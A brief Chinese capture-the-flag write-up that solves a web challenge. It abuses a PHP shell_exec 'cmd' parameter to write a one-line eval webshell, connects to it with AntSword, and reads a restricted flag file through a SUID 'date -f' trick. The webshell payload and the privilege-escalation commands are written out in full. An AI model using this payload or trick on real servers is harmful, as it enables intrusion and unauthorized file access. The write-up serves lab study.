文章目录 考点源码步骤 考点 SUID提权 源码 shell_exec() 通过 shell 执行命令并将完整的输出以字符串的方式返回 步骤 写马,将11111<?php @eval($_POST[1])?>打印到文件webshell.php中?cmd=echo '11111<?php @eval($_POST[1])?>' > webshell.php 访问/webshell.php,写入成功 蚁剑连接 找到疑似flag文件 读不出来 发现权限不够 查看文件权限 找到正在系统上运行的所有SUID可执行文件,发现/bin/date有s权限 利用date命令读取文件,date -f 文件名